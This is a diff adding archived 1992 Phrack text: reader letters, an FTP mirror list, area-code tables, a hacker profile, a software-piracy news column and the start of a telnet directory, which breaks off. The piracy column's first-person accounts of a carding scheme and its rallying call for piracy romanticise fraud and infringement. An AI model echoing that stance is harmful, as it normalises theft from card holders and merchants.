+Australia has been very sparse after my BBS (Micromation) was closed down.  A
+lot of people took it as a warning, and closed up shop as well.  The Amiga
+warez BBSes still continue to flourish, as do some IBM ones.  Because of the
+expense of phone lines ($300 installation of a line, $250 per year rental [in
+American dollars]) we tend to have a lot of BBSes that are dual purpose, i.e.
+both warez and phreak.  Devastation Phase One is a great example:  huge Amiga/
+IBM/phreak/etc.  I, however, was devoted to phreak/hack/etc.  We did have a few
+busts actually, and the police were called in to trace all calls through Vicnet
+and some people I know were caught.  We've got a few warez-monger type people
+here that have been busted for "pitting" (climbing into telecom phone pits, and
+hooking up straight to the lines) - and I had my knuckles rapped by my
+university.  Phoenix's court case still hasn't been settled (he's had 35 of the
+47 charges against him dropped).  Comserve has finally made it down under, and
+they're footing the bill for the first year, allowing us to be on Comserve in
+the States for a while.  Our telephone company (Telecom) is a government
+monopoly, and we've only just passed legislation to allow competition.  The
+first carrier allowed will be a company called Optus.  Call waiting,
+conferencing, etc. is almost standard here now.
+_______________________________________________________________________________
+
+ Censorship in Iowa
+ ~~~~~~~~~~~~~~~~~~
+From:  Mike Begley <spam@iastate.edu>
+
+Hi.  I got your name from Erik Bloodaxe. He said you might be able to help us
+out with a minor problem we're having here.  The computation center at Iowa
+State University will very soon institute a policy of censorship of a number of
+groups of questionable nature, specifically the alt.sex hierarchy, alt.drugs,
+and a few other similar groups.
+
+I wish to conduct a survey of the users of our computer system, but the
+university specificly prohibits mass mailings.
+
+I'm frightened by censorship, and I want to fight this as best I can.  If you
+would be able to do this favor for us, you would be helping to fight electronic
+censorship and suppression of free expression.
+_______________________________________________________________________________
+
+ Phrack FTP Sites
+ ~~~~~~~~~~~~~~~~
+quartz.rutgers.edu   (128.6.60.6)           mc.lcs.mit.edu  (18.26.0.179)
+    Location: /pub/computer/law             Location: /its/ai/digex
+
+mintaka.lcs.mit.edu   (18.26.0.36)          coombs.anu.edu.au  (130.56.96.2)
+    Location: /telecom-archives             Location: /inbound
+
+wuarchive.wustl.edu   (128.252.135.4)       ftp.eff.org  (192.88.144.4)
+    Location: /doc/policy/pub/cud/Phrack    Location: /pub/cud/Phrack
+
+nic.funet.fi   (128.214.6.100)              cs.dal.ca  (129.173.4.5)
+    Location: /pub/doc/phrack               Location: /pub/comp.archives
+
+chsun1.spc.uchicago.edu  (128.135.46.7)     ftp.uu.net  (137.39.1.9)
+    Location: /pub/cud/phrack               Location: /tmp
+
+rascal.ics.utexas.edu   (128.83.138.20)     relay.cs.toronto.edu  (128.100.3.6)
+    Location: /misc/ra/sa/ULM.DE            Location: /doc/telecom-archives
+
+aix370.rrz.uni-koeln.de   (134.95.132.2)
+    Location: /pub/usenet/comp.archives/hackers/journals
+
+titania.mathematik.uni-ulm.de   (134.60.66.21)
+    Location: /info
+
+src.doc.ic.ac.uk   (146.169.3.7)
+    Location: /usenet/comp.archives/hackers/journals
+
+bric-a-brac.apple.com   (130.43.2.3)
+    Location: /pub/stud_reps
+
+faui43.informatik.uni-erlangen.de   (131.188.31.3)
+    Location: /portal/mounts/cyber/pcd/freeware2/magazine
+
+srawgw.sra.co.jp   (133.137.4.3)
+    Location: /.a/sranha-bp/arch/arch/comp.archives/hackers/sites
+_______________________________________________________________________________
+
+ What's Your NPA These Days?
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+                       <><><><><><><><><><><><><><><><>
+                       <>                            <>
+                       <>  AREA CODE SPLITS OF 1991  <>
+                       <>  Researched and Collected  <>
+                       <>      by <Flash!Point>      <>
+                       <>                            <>
+                       <><><><><><><><><><><><><><><><>
+
+
+                              BALTIMORE, MARYLAND
+                C&P Telephone Company Report for 301 NPA Split
+
+                           NXXs Converting to NPA 410
+
+
+205 208 213 221 222 224 225 226 228 232 233 234 235 237 239 242 243 244 247 250
+252 254 255 256 257 260 263 265 266 267 268 269 272 273 275 276 278 280 281 282
+284 285 287 288 289 290 291 296 298 307 312 313 316 319 321 323 325 326 327 328
+329 332 333 335 337 338 339 342 343 346 347 348 351 352 354 355 356 357 358 360
+361 362 363 364 366 367 368 370 374 376 377 378 379 381 382 383 385 388 389 391
+392 393 396 397 398 404 425 426 429 433 435 437 438 440 442 444 446 448 450 452
+455 456 457 458 461 462 465 466 467 471 472 476 477 479 481 482 483 484 485 486
+488 489 494 514 515 516 521 522 523 524 525 526 527 528 529 531 532 533 534 535
+536 537 538 539 541 542 543 544 546 547 548 549 550 551 553 554 555 556 557 558
+560 561 562 563 566 569 573 574 575 576 578 581 583 584 586 591 592 594 597 602
+605 612 613 614 623 624 625 626 628 631 632 633 634 635 636 637 638 639 641 642
+643 644 646 647 648 651 653 655 658 659 661 664 665 666 667 668 669 671 672 673
+674 675 676 677 679 682 683 684 685 686 687 691 692 693 712 715 719 720 721 723
+726 727 728 730 732 734 740 741 742 744 745 747 748 749 750 751 752 754 755 756
+757 758 760 761 764 765 766 768 771 775 778 780 781 783 784 785 787 788 789 792
+793 795 796 798 799 806 813 819 820 821 823 825 827 828 830 832 833 835 836 837
+838 841 844 848 849 850 857 859 860 861 866 867 873 875 876 877 879 880 882 883
+885 886 887 889 892 893 896 906 915 920 922 923 928 931 936 938 939 941 943 944
+945 947 950 954 955 956 957 960 962 964 965 966 968 969 971 974 976 978 979 987
+988 991 992 993 995 996 997 998 999
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                           SAN FRANCISCO, CALIFORNIA
+                Pacific Bell Customer Report For 415 NPA Split
+
+                          NXXs Converting to NPA 510
+
+204 208 210 215 222 223 226 228 229 231 233 234 235 236 237 238 245 248 251 253
+254 256 261 262 263 264 265 268 269 271 272 273 275 276 277 278 279 283 284 287
+293 294 295 297 298 302 307 309 310 313 317 339 351 352 356 357 370 372 373 374
+376 385 410 412 414 416 417 419 420 422 423 425 426 427 428 429 430 432 436 437
+438 439 440 443 444 446 447 448 449 451 452 455 458 460 462 463 464 465 466 471
+475 481 482 483 484 486 487 489 490 498 504 509
+_______________________________________________________________________________
diff --git a/phrack38/3.txt b/phrack38/3.txt
new file mode 100644
index 0000000..cd6c847
--- /dev/null
+++ b/phrack38/3.txt
@@ -0,0 +1,122 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 3 of 15
+
+                              ==Phrack Pro-Phile==
+
+                               Written by Dispater
+
+                          Created by Taran King (1986)
+
+
+     Welcome to Phrack Pro-Phile.  Phrack Pro-Phile is created to bring info to
+you, the users, about old or highly important/controversial people.  This
+month, I bring to you the original of the controversial New TAP Magazine.
+
+                                   Aristotle
+                                   ~~~~~~~~~
+_______________________________________________________________________________
+
+ Personal
+ ~~~~~~~~
+             Handle:  Aristotle
+           Call him:  Kevin
+       Past handles:  Ed, Bob, Bill, and a multitude of other lame handles.
+      Handle origin:  Humanities class in high school.
+      Date of Birth:  April 12, 1970
+Age at current date:  22
+             Height:  5'10"
+             Weight:  145 lbs.
+          Eye color:  Blue
+         Hair Color:  Red
+           Computer:  IBM-PS/2 55SX
+  Sysop/Co-Sysop of:  ALL PAST:  Digital Underground, Blitzkreig, some board on
+                      a major packet switching network, a board on MIT's FSF
+                      machines, and a bazillion other lame boards that I don't
+                      care to mention.
+
+-------------------------------------------------------------------------------
+
+     I was one of those people that played with phones for as long as I can
+remember.  I guess you could say I started phreaking a few years before
+WARGAMES came out.  After the movie, I found out that other people were
+interested in phones too.  Due to the influx of "elite hackers" after the
+movie, information became extrememly available.  This lead to my existence in
+the real world of hack/phreak.
+
+     Eventually I ended up writing articles for both 2600 and TAP.  In the late
+80s I restarted TAP with help from some friends and we started to revive one
+of the first hack/phreak magzines that ever existed.
+
+     Having TAP helped us gain a special insight on how the system really
+works.  Some of our issues were cool enough to actually be censored at certain
+institutions where avid censorship still exists.  Also, we were allowed to see
+how far you could go in expressing your opinion until some bigshot noticed.
+
+     Believe it or not though, running a periodical without any income is a
+major pain.  It was well worth it though as I got to meet a lot of cool people
+and also was able to do something for the computer underground scene.  If you
+currently don't support magazines like 2600, etc., please do.  They are doing a
+lot of work for the community and without them, there would be a major gap in
+the press regarding the truth about our community.
+
+     I exited the hack/phreak world when things got a bit hairy and Craig
+(Knight Lightning) got nailed.  I simply decided that a hobby is not worth
+going to jail for and that it did not pay the bills either.  Anyways, most old
+hacks eventually reach the point where everything they see seems old and
+boring.  This is where I currently am.
+
+     Today I am employed at a computer lab at a large university where I am
+working on a degree.
+-------------------------------------------------------------------------------
+
+ Aristotle's Favorite Things
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+       Women:  Karen (To be married soon)
+        Cars:  REAL Cars:  '86 Mustang GT, '86 VW Golf, various Porsches.
+       Foods:  Anything that you cannot get at a drive-thru.
+       Music:  Metallica, Bach, Danzig, Anthrax.
+     Authors:  All the posters of Alt.Sex
+       Books:  The Art of War
+ Outdoor fun:  Snowboarding
+
+ Most Memorable Experiences
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ o  Getting engaged
+ o  My first blue box call
+ o  Watching some guy die after wrecking his car
+ o  Being interviewed by the FBI for something I did not do and then pissing
+    them off by allowing them to prove that they were wrong.
+ o  All of the SummerCons and other assorted h/p meetings.
+
+ Some People to Mention
+ ~~~~~~~~~~~~~~~~~~~~~~
+ o  Bill from RNOC : Getting us kicked out of the museum at the Arch.
+ o  Cheshire Catalyst : Help with restarting TAP.
+ o  Slave Driver : For his hospitality and the infamous "Guess who/what died in
+                   the couch" game.
+ o  The Mentor : For the BBS and his non-snobbish attitude.
+ o  J.R. "Bob" Dobbs : All the cool blue box info.
+ o  The Not : All the help with Unix
+ o  Taran King : For being an exception to the "Hackers are all geeks" rule.
+ o  Knight Lightning : For sending back the pictures and generally being a cool
+                       guy.
+ o  Dispater : For having the no-bullshit attitude and actually getting the job
+               done.
+ o  Nite Ranger : For helping me realize that lamers will always exist (not you
+                  though).
+ o  Predat0r : All the experiences.
+ o  All the Legion of d0oDs : For adding to the entertainment at PartyCon.
+
+-------------------------------------------------------------------------------
+
+     Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?
+
+     Of the general population, I would consider about 89.9% to be nerds.  I
+would also consider 65% of the entire population nerds and/or strange.  Phreaks
+may be geeks but each usually has his/her cool qualities as everyone does.
+Most are socially lacking though.  Keep in mind that a hacker/phreak is ALWAYS
+better than the average GIF viewing geek.
+_______________________________________________________________________________
diff --git a/phrack38/4.txt b/phrack38/4.txt
new file mode 100644
index 0000000..9ce3465
--- /dev/null
+++ b/phrack38/4.txt
@@ -0,0 +1,408 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 4 of 15
+
+                                 Pirates' Cove
+                                   Issue Two
+
+                                   By Rambone
+
+     Welcome to Issue Two of Pirate's Cove.  There is a lot going on in the
+Pirate community, busts of pirates in the USA and Canada, and new software and
+operating systems like IBM's OS/2.  So sit back and absorb the news.
+
+     First on the agenda is to discuss the over-talked about, and hopefully
+dead issue of the carding scam initiated by The Grim Reaper and The Not So
+Humble Babe.  The reason Phrack Magazine delayed publishing anything about this
+bust was because we refused to publish any third party rumors and idle gossip.
+Now that I have personally spoken with the Grim Reaper, we can shed some light
+on this subject.
+
+     Mike "The Grim Reaper" obviously regrets what has transpired and would
+like to put this part of his life behind him.  At this point in time, he still
+does not know what is going to happen, and is taking his arrest very seriously.
+Mike asked me just to use the letter he has written.  Some of you may have seen
+this before, some may not.
+
+*******************************************************************************
+
+ Statement by The Grim Reaper
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+                        "Lamer Pirate Magazines, Etc..."
+                               By THE GRIM REAPER
+
+     This was originally going to be an article for iNSANITY Magazine #4 called
+"Lamer Pirate Mags, Etc." to straighten out the complete bullshit and lies in
+Badnews #7, but seeing as there are so many rumors floating around, and the
+future of iNSANITY is undecided, I decided to just put out this text file to
+explain what is really going on, less a few lamers out there spread all kinds
+of bullshit and lies, as they seem to do so often.
+
+     Pretty much everything in Badnews #7 was a complete lie, as most of you
+already know by now.  They didn't have any backdoors to ViSiON-X, and there
+aren't and weren't any that allowed someone to get the user list.  What
+happened on Showdown was the Sysop PW was given out to the wrong person, and
+they used it, so again, nothing but B.S. and hype on their end.  While I think
+the FiRM overhyped themselves, they didn't deserve the ragging they got by BaD,
+and BaD having failed in their own attempt at a pirate group has no right to
+criticize ANYONE until they've accomplished the same. Perhaps a few of the
+other groups could have said something to them (and many talked about it) but
+they didn't deserve the 3rd Degree from a lamer mag.
+
+     The main reason for this article was that while many found the BaD Mag
+to be so completely full of shit to the point that it was hilarious, some got
+to thinking that down the line, someone might actually believe some of the B.S.
+They claimed to be the group that caused the downfall of THG, PE and others,
+which was a complete joke...  They had absolutely nothing to do with any of
+that.  USA had killed off THG, etc...  What else was there to straighten up?
+
+
+                         "Did they shoot your Dog????"
+                                     - Anonymous Lamer
+
+     So what's up?  Well, to make it short and blunt, The NotSoHumble Babe and
+I were involved in a carding incident.  She most likely was being watched by
+certain people since she had been using false corporations and fake Tax ID
+Numbers to order games and for suppliers for USA.  The Secret Service either
+stumbled across us that way, from one of the orders gone bad, or from the
+illegal cash and hardware coming in to Enterprize.  The NSH Babe (Amy) had a
+cash flow from Dist Sites and other hot hardware from USA Sites totalling about
+$3500-$5000 a month.  She had sent one of her hot laptops she gets every month
+to Optical Illusion in Canada, and asked him to sell it for her.  He wanted to
+be nice and tried to sell it.  A local from his 416 area wanted to buy the
+laptop.  He went to sell it, and was busted by a plainclothes police officer
+for possession of stolen property of over a $1000.
+
+     I found some CC #'s, she had a lot of experience with UPS and FedEx from
+ordering games, and she thought of a way to pick up the packages.  We both
+placed orders (I placed about 2/3rds since she was picking up, and she placed
+about a 1/3rd).  Most of the stuff wasn't for myself, and was meant for other
+people (trying to be nice, eh?).  In any case, we shouldn't have done it. TNSH
+Babe wanted to order a A LOT of stuff because, over time, she owed people in
+USA a lot of hardware they had paid her for, and she had never sent any to
+them.  We ordered a bit too much, more than I thought we should have.
+
+
+                  "They had Bulletproof Vests and Grenades??"
+                                      - Another |<-Rad D00D!!
+
+     So then what?  Well, they found out the packages were coming and were
+waiting for TNSH Babe to pick them up.  They went back to her place and she
+gave them permission to come in and search (dunno what happened in between
+then).  She talked to them and they wanted to have her give some of the stuff
+to me that she got when we were supposed to meet for the first time at a
+Meijers parking lot.  There were some weird things going on at the time, and an
+alarm was flashing in the back of my mind, but I decided to ignore it.  Anyhow,
+she handed me a hard drive or something, then, basically, they moved in. I saw
+a car pulling up, and figured what was going on.  One guy said, "Secret
+Service" (about 6 people), and it kinda went downhill from there.  But
+seriously, they weren't that bad and I cooperated with them.
+
+     They wanted to go back to my house and look around, and wanted permission.
+They said they would have gotten a search warrant, and it was in my best
+interest to cooperate, so I let them come in.  Basically there wasn't anything
+in the house, I always throw everything out when I am done with it.  As far as
+the computer went, I didn't even have anything Unzipped on the Hard Drive that
+I hadn't paid for.  They wanted to look further on the computer and in the end
+did take it, but gave me a receipt.  I paid for my entire system, so don't
+listen to some of the lamer textfiles floating around.  There wasn't anything
+on my system, so I might get lucky and they'll give it back.  They also took 3
+or 4 computers from Amy's place, but left Static with his.  This was the first
+time either of us had done anything like this.  There had been a few attempts
+in the past, but nothing that had ever been followed through, or had worked.
+No no, I've never been busted for this before, or anything.  I've never been
+arrested for anything before.
+
+                     "I formatted my Hard Drive 3 Times!!"
+                                         - Local 313 Sysop
+
+     I don't know if it was overreacting, but our dumb situation seemed to
+affect a lot of other people.  The locals over here went apeshit, and many of
+them formatted their drives and deleted files (20+), and took their boards down
+temporarily.  Many of the major pirate boards decided to power down for a
+while.  Unfortunately many of the truly good boards in the world have gone
+down, possibly forever.  BBS-A-Holic has gone down, Enterprize is now PD Only,
+many INC boards, LSD2 possibly for related reasons, The VOID of course, and
+many others.  Many big names are considering quitting the pirate scene because
+they think it's not worth it, and they're right.  Some of the boards may come
+back.  BBS-A-Holic was one of my favorites.  Many considered The VOID one of
+the Top 10 Boards in the world as far as quality went, and I appreciate the
+users and the support.  I worked hard to try to make it the best, and put my
+heart into it.  As are many others, Black Spyrit might be retiring, so I don't
+know if another iNSANITY Issue will be coming out.  It was truly a great mag if
+you never saw it.  The best.
+
+
+      "I heard they were thrown in jail, and fined $72 Million Dollars!!"
+                                              - Another Neverending Lamer
+
+     No matter what or who the issue, this never stops, eh?  I wouldn't believe
+any of the bullshit text files, mostly from jealous people and the few enemies
+you get when you end up getting towards the top, especially the anonymous
+(surprise) text file taken off of OOFNet (surprise again, huh? Heh).  All are,
+as always, complete B.S.
+
+     Try not to be a lamer.  There are too many of 'em, and they do nothing for
+the pirate world.  If you are going to do anything, do SOMETHING.  Organize a
+group of some type, coordinate couriers, do some VGA or ANSI work, or get in a
+group, but don't be a lamer.  Call LD, establish a rep, and see what you are
+missing.  All locals aren't lamers, but 90% are.
+
+A Lamer - A person who calls only local boards, does nothing but leeches files,
+          and doesn't contribute to groups in any ways.
+
+     Neither BaD, any locals, or Socrates had anything to do with us getting
+into trouble in any way.
+
+                         "Don't try this at home kids."
+                                             - Grim '92
+
+     All things considered, I wish it wouldn't have ended this way.  I don't
+think any of this was good for anyone in the pirate or BBS world.  USA is now
+pretty much a dead group.  Many of the best boards have gone down, and others
+are considering calling it quits because it just isn't worth it. INC never was
+a for-profit group, and had no illegitimate cash flow, unlike USA.
+
+*******************************************************************************
+
+ Rambone's Remarks
+ ~~~~~~~~~~~~~~~~~
+     Well that's the real story, straight from the horse's mouth.  I've read at
+least a dozen text file's after this one, and I tend to believe what Mike has
+written.  Now Amy (NotSoHumble Babe) tells a different story.  According to her
+text file, she had seldom carded or phreaked before, but no one seems to be
+able to corroborate this information, and people that know her tend to say she
+was in deeper than she cares to admit.  It's also been brought to my attention
+that Amy may be volunteering information to the feds about other people.  What
+she has done before or after the bust may or may not be true, but here is her
+story.
+
+*******************************************************************************
+
+ Statement by The Not So Humble Babe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Well, I am sure you have all heard that I had a small legal problem
+today, and I know how stuff gets blown out of proportion, so I thought I'd
+explain the story myself.  Here goes...
+
+     I have carded a few items in the past 3 days, and I have NEVER done this
+before.  The Grim Reaper got CBI accounts and placed orders, and I picked them
+up.  Well, one of the places Grim ordered from was Paradise Computers.  They
+knew it was a bogus order, but told us the package was shipped.  Then they
+called the FEDS.  Anyhow, the Feds must have been watching the pickup spot,
+then following me around until I met up with Grim to deliver his share of the
+stuff.  As soon as we went to make the exchange, the Secret Service, FBI, state
+police, and local police were running at us with bulletproof vests and
+automatic guns.  They handcuffed us, separated us, and took each of us back to
+our homes for them to search.
+
+     I haven't talked to Grim Reaper since I saw him lying next to me on the
+ground being arrested.  But here's my story.  About 20 agents came to my
+apartment and grabbed all computer equipment without a receipt.  So we still
+have 1 modem, and this computer system.  Anyhow, they grabbed every piece of
+paper they could find.  Unfortunately, I am a very organized person, and had
+"the who's who in the pirate world" written down for my use.  So if you ever
+gave me your real name, number, or address, it is now in the hands of the
+Secret Service and FBI.  This list was quite large, as it took 2 years to
+compile.
+
+     These boys did their homework.  They knew Enterprize was USA HQ and they
+knew my handle, and they knew I supplied the group with software.  They weren't
+going for just anyone here guys; they knew they needed to bust a group leader.
+Well, they did.  Got me on carding, pirating, and a ton of other legal terms
+having to do with both of these.
+
+     I was charged with 6 different counts, each holding a 5-30 year prison
+sentence.  It doesn't look good for me at all.  I'll post a file as soon as I
+get arraigned and let you guys know what is going on.
+
+     But I will say this now, and I MEAN it.  I love the groups, the software,
+and the competition.  But regardless of what happens to me, I am done forever.
+No more NotSoHumble Babe, no more USA.  I hate to do this to everyone, but I
+really don't have a choice.  And regardless of who I am that got busted, be
+strong and support what you believe in your hearts:  PIRACY.  Don't let them
+win.  You guys can all go on without me.  Just promise me you won't give up and
+throw in the towel.  If anyone wants to contact me, you can leave e-mail on
+Enterprize for me, or call voice AT YOUR OWN RISK.  They told me they were
+tapping the phone lines.
+
+*******************************************************************************
+
+ News Flash:  Mutli-Media Aggravation
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Mutli-Media games (CD-Rom) are being played on the hard drive.  There
+seems to be a trend of starting to send out huge CD-Rom games electronically
+through BBSes, the first one being Battle Chess I, and taking as much as 30
+megs of hard-drive space.  Soon after, Steller 7, and Wing Commander I started
+to show up.  One of the reason for the start of this was a lack of programs
+coming down the pike, and one group decided to send Battle Chess out.  I
+haven't seen anything lately, and hope programs meant for the CD-Rom will stay
+that way.
+
+*******************************************************************************
+
+ Another News Flash:  OS/2 2.0 GA
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     IBM has released the long anticipated OS/2 (Operating System 2) 2.0 GA.
+OS/2 2.0 is an alternative to DOS 3.3, 4.01, or the latest, 5.0, and implements
+true 32 bit technology.  There are several ways of using this operating system.
+OS/2, implementing it's own version of FAT, Dual Boot (which will allow you to
+be able to use DOS if necessary), and a Multi-Boot, brings up a prompt a when
+booting up which allows you to choose which operating system you would like to
+use (similar to Vpix for Unix and Xenix).
+
+     I had the opportunity to view a preview of OS/2 2.0 GA at our local IBM
+Corporate Building, and to say the least, I was impressed.  One of the points
+stressed at the meeting was the diverse control over many programs at the same
+time.  OS/2 comes with its own operating system, along with a clone of sorts of
+both DOS and Windows.  This feature will enable a user to access a DOS
+emulation without having to actually boot up DOS on the machine.  It also has a
+Windows emulation which will eradicate the need for a full blown version.  The
+one shortcoming of this is that it is Version 3.0, but I have been informed
+that 3.1 is right around the corner, and actually saw a demonstration of it.
+
+     The true strong point of OS/2 is the mutli-tasking.  After witnessing
+15 windows open at the same time, all with programs running concurrently, I
+truly can say this is a step into the future, and it is here now.  My personal
+experience running 2.0 is very impressive.  Being able to properly run a
+program with the BBS in the background is a welcome treat, and I see no reason
+to ever support another operating system, until I get my hands on Windows NT.
+
+*******************************************************************************
+
+ Industry News
+ ~~~~~~~~~~~~~
+     The long awaited A-10 Avenger by Spectrum Holybyte has now been pushed
+back till early next year.  This was the next in a series of interactive
+programs put out by SH to be played over the modem, the first being Falcon 3.0,
+a 256VGA jet game.
+
+      UT (Ultra-Tech) and EMC (Electro-Magnetic Crackers) have now merged.
+This merger will be beneficial to both groups, bringing lacking talents
+together to form one of the largest cracking groups in the world, one with
+strong software connections, and the other with cracking resources and existing
+software support sites.  Captain Tom of UT and Cyborg of EMC brought the whole
+thing together as a reality, and this merger may point them in the same
+direction as when INC formed their group from several smaller groups.
+
+*******************************************************************************
+
+ BBS Bust in Canada
+ ~~~~~~~~~~~~~~~~~~
+     The Federal Investigations Section of the RCMP seized components of an
+electronic bulletin board system (BBS) "90 North" at a West Island residence.
+This is believed to be the first execution of a search warrant under the
+Copyright Act of Canada against an electronic bulletin board system.
+
+     The seizure included 10 micro computers, seven modems and the software
+present on these systems (approximate value of $25,000).  An electronic
+bulletin board is a service which allows personal computer users to exchange
+messages and to exchange or receive computer files including software, text and
+digitized images over telephone lines via a modem.
+
+     During a four-month investigation, it was established that the 90 North
+BBS enabled users to obtain software in exchange for other files or for an
+annual fee of $49.00.  While some of the programs consisted of "shareware"
+which may legally be distributed in this way, much of the available material
+was protected under the Copyright Act including beta versions of commercial
+software packages which have not yet been released on the market.  More than
+3,000 software programs were available to users of this BBS including
+WordPerfect 5.0, Microsoft DOS 5.0, Windows 3.0, Lotus 1-2-3 for Windows,
+Borland C++ 2.0, Quattro Pro 3.0, d-Base IV 1.1, SCO Xenix for DOS, Netware
+3.11 and Clipper 5.0.
+
+     Charges of commercial distribution of pirated software are planned against
+the owner and operator of 90 North.  Paragraph 42 (1)(c) of the Copyright Act
+states that "every person who knowingly distributes, infringes, copies of any
+work in which copyright subsists either for the purpose of trade or to such
+intent as to affect prejudicially the owner of the copyright, is guilty of an
+offense and liable on summary conviction, to a fine not exceeding $25,000 or to
+imprisonment for a term not exceeding six months or to both, or on conviction
+on indictment, or a fine not exceeding $1 million or to imprisonment for a term
+not exceeding five years or both."
+_______________________________________________________________________________
+
+ More Details On The Canadian BBS Bust
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     The Royal Canadian Mounted Police (RCMP) has, for the first time under
+the Copyright Act of Canada, seized all the components of an electronic
+bulletin board (BBS), for providing illegal copies of copyrighted software to
+its subscribers.
+
+     According to Allen Reynolds of the secretariat of the Canadian Alliance
+Against Software Theft (CAAST), the Federal Investigations Section of the RCMP
+has not laid formal charges against the West Island, Quebec owner and operator
+of the BBS.  Charges of commercial distribution of pirated software are planned
+against the owner of 90 NORTH, he said.
+
+     CAAST is a Canadian organization made up of ASHTON-TATE CANADA, LOTUS
+DEVELOMENT CANADA, MICROSOFT CANADA, NOVELL CANADA, and QUARTERDECK OFFICE
+SYSTEMS CANADA.  Its main objective is to educate the public and business about
+the hazards of software piracy.
+
+     In the raid, the RCMP seized 10 Micro computers, seven modems, and about
+$25,000 worth of software which was allegedly being distributed to users of the
+90 NORTH BBS for an annual $49.00 fee, Reynolds said.
+
+     Some of the seized software packages were Wordperfect 5.0, MS-DOS 5.0,
+Windows 3.0, Lotus 1-2-3 for Windows, dBase IV, Netware 3.11, and Qemm.  If
+charged and convicted on a summary conviction, the 90 NORTH owner could face
+either a penalty or a fine not exceeding $25,000 or a jail term not exceeding
+six months or both.  If the 90 NORTH owner is convicted on indictment, the
+penalty is a fine not exceeding $1 million or imprisonment for a term not
+exceeding five years or both.  "I don't know how long it will take to lay
+charges," Reynolds said.  He would not speculate when the RCMP would charge the
+owner of 90 NORTH, but he did say that the users of the 90 NORTH BBS will not
+be investigated by by the RCMP.
+
+     He added that there is reason to believe that a number of BBSes across
+Canada are supplying beta test versions of products which can be dangerous to a
+user's system because they are usually laced with bugs.
+
+*******************************************************************************
+
+ Rambone's Remarks
+ ~~~~~~~~~~~~~~~~~
+     I have been informed that there are several more bulletin boards,
+especially those in the 416 NPA, that are under investigation right now.  Most
+of the sysops being busted are ones that charge for download credits, which is
+a violation of the Copyright Act for reselling software.
+
+*******************************************************************************
+
+ New Release
+ ~~~~~~~~~~~
+               Ultima UnderWorld by Origin
+               Name:  The Stygian Abyss
+               Company:  Origin
+               Graphics:  256VGA
+               Sound:  SB/SB-Pro/Adlib/Roland
+               Rating:  10/10
+               Supplier:  High Pockets/Red Runner
+               Copy Protection:  None
+               Date:  3/26/92
+
+     Looking for virtual reality in a game?  Didn't think you could find it?
+Welcome to Origin's Ultima UnderWorld, "The Stygian Abyss."  Don't let the name
+fool you, this game does not have any attributes from the Ultima 1-6 series.
+You start out in a dark room looking out into what would be called a 3-D
+perspective.  Picking up the bag in front of you would be your best bet -- it
+may have things that you need.  Once you are on your way, you will notice how
+realistic the walls, ground, and ceiling look, almost like you are there.
+Along the way in your adventure, you will encounter many items that will help
+you along the way and some that may not, but you will have to decide.  There
+are also many cultures down below that will be friendly and not-so-friendly;
+use your best judgement.  Learn all your abilities.  They will come in handy
+down the road.  Practice your magic, it may save your life, or help you walk
+across water (hint).  Learning how to jump correctly is important.  You'll have
+to be able to leap across flaming, volcanic ravines to be able to finish the
+game.  When you see writing on the wall or in a scroll with words and telling
+you to chant this to the Mantra, you better copy them down:  They build up your
+attributes.
+
+     All in all, there are 7 levels, and one unexplored level, sporting true
+256VGA graphics, SB-Pro support, and a riveting sound-track.  This is this
+closest thing to virtual reality graphics in the game market today, and it'll
+be a while before you play anything else like it.
+_______________________________________________________________________________
diff --git a/phrack38/5.txt b/phrack38/5.txt
new file mode 100644
index 0000000..db71ed6
--- /dev/null
+++ b/phrack38/5.txt
@@ -0,0 +1,776 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 5 of 15
+
+                             Network Miscellany IV
+                         Compiled from Internet Sources
+                              by Datastream Cowboy
+
+                    Network Miscellany created by Taran King
+
+
+ Special Internet Connections                                  February 5, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                Most Recent Update
+ Comments to: Scott Yanoff <yanoff@CSD4.CSD.UWM.EDU>
+
+American Philosophy Association
+     telnet atl.calstate.edu or 130.150.102.33
+     Login: apa
+     OFFERS:  BBS for APA.
+
+Archie
+     telnet archie.mcgill.ca or 132.206.2.3            (Canada)
+     telnet archie.funet.fi or 128.214.6.100           (Finland/Europe)
+     telnet archie.au or 128.184.1.4                   (Australia/New Zealand)
+     telnet cs.huji.ac.il or 132.65.6.5                (Israel)
+     telnet archie.doc.ic.ac.uk or 146.169.3.7         (United Kingdom/Ireland)
+     telnet archie.sura.net or 128.167.254.179         (Maryland, USA)
+     telnet archie.unl.edu (Password: archie1)         (Nebraska, USA)
+     telnet archie.ans.net or 147.225.1.2              (New York, USA)
+     telnet archie.rutgers.edu or 128.6.18.15          (New Jersey, USA)
+     OFFERS: Internet anonymous FTP database.  (Login: archie)
+
+Archie Mail Servers
+     mail archie@<INSERT ONE OF ABOVE ADDRESSES HERE>
+     Subject: help
+     OFFERS: Alterative Archie access to those without ftp or telnet access.
+
+Automated Data Service
+     telnet tycho.usno.navy.mil or 192.5.41.239
+     Login: ads
+     OFFERS: Navigational/Time/Astronomical Information.
+
+CARL
+     telnet pac.carl.org or 192.54.81.128
+     OFFERS: Online database, book reviews, magazine fax delivery service.
+
+CHAT
+     telnet debra.doc.ca or telnet 192.16.212.15
+     Login: chat
+     OFFERS: Conversion of Hypertext Access Technical information files.
+
+Cheeseplant's House
+     telnet orchid.csv.warwick.ac.uk 2001 or 137.205.192.5
+     OFFERS: Online chat service in a very unique format.
+
+Chess Server
+     telnet lark.utah.edu 5000 or telnet 128.110.128.72 5000
+     OFFERS: Play/watch real-time chess with human opponents.
+     Type "help" for help
+
+C64 Archive Server
+     mail twtick@corral.uwyo.edu
+     Subject: Mail-Archive-Request  Body-of-letter: help (hit return) end
+
+Dante Project
